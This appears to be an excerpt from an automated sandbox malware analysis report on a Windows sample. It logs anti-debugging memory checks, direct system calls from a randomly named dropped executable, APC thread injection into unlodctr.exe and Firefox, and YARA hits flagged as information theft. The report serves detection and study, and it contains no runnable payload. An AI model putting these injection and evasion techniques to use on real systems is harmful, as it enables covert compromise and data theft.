Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116A9D3 mov eax, dword ptr fs:[00000030h] 2_2_0116A9D3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011369C0 mov eax, dword ptr fs:[00000030h] 2_2_011369C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA9D0 mov eax, dword ptr fs:[00000030h] 2_2_010AA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA9D0 mov eax, dword ptr fs:[00000030h] 2_2_010AA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA9D0 mov eax, dword ptr fs:[00000030h] 2_2_010AA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA9D0 mov eax, dword ptr fs:[00000030h] 2_2_010AA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA9D0 mov eax, dword ptr fs:[00000030h] 2_2_010AA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA9D0 mov eax, dword ptr fs:[00000030h] 2_2_010AA9D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D49D0 mov eax, dword ptr fs:[00000030h] 2_2_010D49D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112E9E0 mov eax, dword ptr fs:[00000030h] 2_2_0112E9E0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D29F9 mov eax, dword ptr fs:[00000030h] 2_2_010D29F9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D29F9 mov eax, dword ptr fs:[00000030h] 2_2_010D29F9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112C810 mov eax, dword ptr fs:[00000030h] 2_2_0112C810
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114483A mov eax, dword ptr fs:[00000030h] 2_2_0114483A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114483A mov eax, dword ptr fs:[00000030h] 2_2_0114483A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2835 mov eax, dword ptr fs:[00000030h] 2_2_010C2835
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2835 mov eax, dword ptr fs:[00000030h] 2_2_010C2835
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2835 mov eax, dword ptr fs:[00000030h] 2_2_010C2835
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2835 mov ecx, dword ptr fs:[00000030h] 2_2_010C2835
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2835 mov eax, dword ptr fs:[00000030h] 2_2_010C2835
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2835 mov eax, dword ptr fs:[00000030h] 2_2_010C2835
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA830 mov eax, dword ptr fs:[00000030h] 2_2_010DA830
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B2840 mov ecx, dword ptr fs:[00000030h] 2_2_010B2840
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4859 mov eax, dword ptr fs:[00000030h] 2_2_010A4859
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4859 mov eax, dword ptr fs:[00000030h] 2_2_010A4859
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D0854 mov eax, dword ptr fs:[00000030h] 2_2_010D0854
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112E872 mov eax, dword ptr fs:[00000030h] 2_2_0112E872
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112E872 mov eax, dword ptr fs:[00000030h] 2_2_0112E872
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01136870 mov eax, dword ptr fs:[00000030h] 2_2_01136870
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01136870 mov eax, dword ptr fs:[00000030h] 2_2_01136870
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0887 mov eax, dword ptr fs:[00000030h] 2_2_010A0887
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112C89D mov eax, dword ptr fs:[00000030h] 2_2_0112C89D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE8C0 mov eax, dword ptr fs:[00000030h] 2_2_010CE8C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116A8E4 mov eax, dword ptr fs:[00000030h] 2_2_0116A8E4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC8F9 mov eax, dword ptr fs:[00000030h] 2_2_010DC8F9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC8F9 mov eax, dword ptr fs:[00000030h] 2_2_010DC8F9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111EB1D mov eax, dword ptr fs:[00000030h] 2_2_0111EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CEB20 mov eax, dword ptr fs:[00000030h] 2_2_010CEB20
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CEB20 mov eax, dword ptr fs:[00000030h] 2_2_010CEB20
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01168B28 mov eax, dword ptr fs:[00000030h] 2_2_01168B28
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01168B28 mov eax, dword ptr fs:[00000030h] 2_2_01168B28
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114EB50 mov eax, dword ptr fs:[00000030h] 2_2_0114EB50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01136B40 mov eax, dword ptr fs:[00000030h] 2_2_01136B40
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01136B40 mov eax, dword ptr fs:[00000030h] 2_2_01136B40
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116AB40 mov eax, dword ptr fs:[00000030h] 2_2_0116AB40
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01148B42 mov eax, dword ptr fs:[00000030h] 2_2_01148B42
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01154B4B mov eax, dword ptr fs:[00000030h] 2_2_01154B4B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01154B4B mov eax, dword ptr fs:[00000030h] 2_2_01154B4B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109CB7E mov eax, dword ptr fs:[00000030h] 2_2_0109CB7E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01154BB0 mov eax, dword ptr fs:[00000030h] 2_2_01154BB0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01154BB0 mov eax, dword ptr fs:[00000030h] 2_2_01154BB0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0BBE mov eax, dword ptr fs:[00000030h] 2_2_010B0BBE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0BBE mov eax, dword ptr fs:[00000030h] 2_2_010B0BBE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114EBD0 mov eax, dword ptr fs:[00000030h] 2_2_0114EBD0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C0BCB mov eax, dword ptr fs:[00000030h] 2_2_010C0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C0BCB mov eax, dword ptr fs:[00000030h] 2_2_010C0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C0BCB mov eax, dword ptr fs:[00000030h] 2_2_010C0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0BCD mov eax, dword ptr fs:[00000030h] 2_2_010A0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0BCD mov eax, dword ptr fs:[00000030h] 2_2_010A0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0BCD mov eax, dword ptr fs:[00000030h] 2_2_010A0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112CBF0 mov eax, dword ptr fs:[00000030h] 2_2_0112CBF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CEBFC mov eax, dword ptr fs:[00000030h] 2_2_010CEBFC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8BF0 mov eax, dword ptr fs:[00000030h] 2_2_010A8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8BF0 mov eax, dword ptr fs:[00000030h] 2_2_010A8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8BF0 mov eax, dword ptr fs:[00000030h] 2_2_010A8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112CA11 mov eax, dword ptr fs:[00000030h] 2_2_0112CA11
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CEA2E mov eax, dword ptr fs:[00000030h] 2_2_010CEA2E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DCA24 mov eax, dword ptr fs:[00000030h] 2_2_010DCA24
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DCA38 mov eax, dword ptr fs:[00000030h] 2_2_010DCA38
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C4A35 mov eax, dword ptr fs:[00000030h] 2_2_010C4A35
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C4A35 mov eax, dword ptr fs:[00000030h] 2_2_010C4A35
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0A5B mov eax, dword ptr fs:[00000030h] 2_2_010B0A5B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0A5B mov eax, dword ptr fs:[00000030h] 2_2_010B0A5B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6A50 mov eax, dword ptr fs:[00000030h] 2_2_010A6A50
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DCA6F mov eax, dword ptr fs:[00000030h] 2_2_010DCA6F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DCA6F mov eax, dword ptr fs:[00000030h] 2_2_010DCA6F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DCA6F mov eax, dword ptr fs:[00000030h] 2_2_010DCA6F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111CA72 mov eax, dword ptr fs:[00000030h] 2_2_0111CA72
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111CA72 mov eax, dword ptr fs:[00000030h] 2_2_0111CA72
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114EA60 mov eax, dword ptr fs:[00000030h] 2_2_0114EA60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 mov eax, dword ptr fs:[00000030h] 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174A80 mov eax, dword ptr fs:[00000030h] 2_2_01174A80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D8A90 mov edx, dword ptr fs:[00000030h] 2_2_010D8A90
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8AA0 mov eax, dword ptr fs:[00000030h] 2_2_010A8AA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8AA0 mov eax, dword ptr fs:[00000030h] 2_2_010A8AA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F6AA4 mov eax, dword ptr fs:[00000030h] 2_2_010F6AA4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F6ACC mov eax, dword ptr fs:[00000030h] 2_2_010F6ACC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F6ACC mov eax, dword ptr fs:[00000030h] 2_2_010F6ACC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F6ACC mov eax, dword ptr fs:[00000030h] 2_2_010F6ACC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0AD0 mov eax, dword ptr fs:[00000030h] 2_2_010A0AD0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D4AD0 mov eax, dword ptr fs:[00000030h] 2_2_010D4AD0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D4AD0 mov eax, dword ptr fs:[00000030h] 2_2_010D4AD0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DAAEE mov eax, dword ptr fs:[00000030h] 2_2_010DAAEE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DAAEE mov eax, dword ptr fs:[00000030h] 2_2_010DAAEE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01158D10 mov eax, dword ptr fs:[00000030h] 2_2_01158D10
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01158D10 mov eax, dword ptr fs:[00000030h] 2_2_01158D10
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BAD00 mov eax, dword ptr fs:[00000030h] 2_2_010BAD00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BAD00 mov eax, dword ptr fs:[00000030h] 2_2_010BAD00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BAD00 mov eax, dword ptr fs:[00000030h] 2_2_010BAD00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D4D1D mov eax, dword ptr fs:[00000030h] 2_2_010D4D1D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01096D10 mov eax, dword ptr fs:[00000030h] 2_2_01096D10
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtQuerySystemInformation: Direct from: 0x76EF48CC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtOpenSection: Direct from: 0x76EF2E0C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtQueryInformationToken: Direct from: 0x76EF2CAC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtCreateFile: Direct from: 0x76EF2FEC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtOpenFile: Direct from: 0x76EF2DCC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtTerminateThread: Direct from: 0x76EF2FCC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtOpenKeyEx: Direct from: 0x76EF2B9C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtSetInformationProcess: Direct from: 0x76EF2C5C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtCreateMutant: Direct from: 0x76EF35CC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtResumeThread: Direct from: 0x76EF36AC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtMapViewOfSection: Direct from: 0x76EF2D1C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtReadFile: Direct from: 0x76EF2ADC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtDelayExecution: Direct from: 0x76EF2DDC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtQueryInformationProcess: Direct from: 0x76EF2C26 Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtResumeThread: Direct from: 0x76EF2FBC Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtCreateUserProcess: Direct from: 0x76EF371C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtWriteVirtualMemory: Direct from: 0x76EF490C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtSetInformationThread: Direct from: 0x76EE63F9 Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtSetInformationThread: Direct from: 0x76EF2B4C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe NtCreateKey: Direct from: 0x76EF2C6C Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\SysWOW64\unlodctr.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Thread register set: target process: 6208 Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Thread APC queued: target process: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: SIsaiIITJVPvUAG.exe, 00000005.00000002.3271322803.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000000.2495048544.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271615426.0000000001B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: SIsaiIITJVPvUAG.exe, 00000005.00000002.3271322803.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000000.2495048544.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271615426.0000000001B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: SIsaiIITJVPvUAG.exe, 00000005.00000002.3271322803.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000000.2495048544.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271615426.0000000001B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: SIsaiIITJVPvUAG.exe, 00000005.00000002.3271322803.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000000.2495048544.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271615426.0000000001B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3271480476.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3270633150.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3271525357.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3271198563.0000000001580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588306707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
